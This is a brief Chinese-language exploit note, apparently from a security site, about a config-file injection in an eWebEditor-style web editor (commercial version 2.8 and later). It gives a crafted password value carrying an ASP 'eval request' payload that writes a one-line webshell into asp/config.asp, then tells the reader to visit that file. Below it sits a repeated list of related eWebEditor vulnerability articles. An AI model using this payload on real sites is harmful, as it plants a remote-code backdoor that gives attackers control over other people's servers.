影响版本:=>2.8 商业版
攻击利用:
登陆后台,点击修改密码---新密码设置为 1":eval request("h")’
设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了.
只显示10条记录相关文章
ewebeditor无后台另类拿站 (浏览: 39742, 评论: 1)
SQL注入eWebEditor数据库 (浏览: 9212, 评论: 0)
ewebeditor for php任意文件上传漏洞 (浏览: 12184, 评论: 0)
eWebEditor suffers from a directory traversal vulnerability (浏览: 7933, 评论: 0)
ewebeditor 5.2 列目录漏洞 (浏览: 9918, 评论: 0)
SQL注入eWebEditor数据库 (浏览: 9212, 评论: 0)
ewebeditor for php任意文件上传漏洞 (浏览: 12184, 评论: 0)
eWebEditor suffers from a directory traversal vulnerability (浏览: 7933, 评论: 0)
ewebeditor 5.2 列目录漏洞 (浏览: 9918, 评论: 0)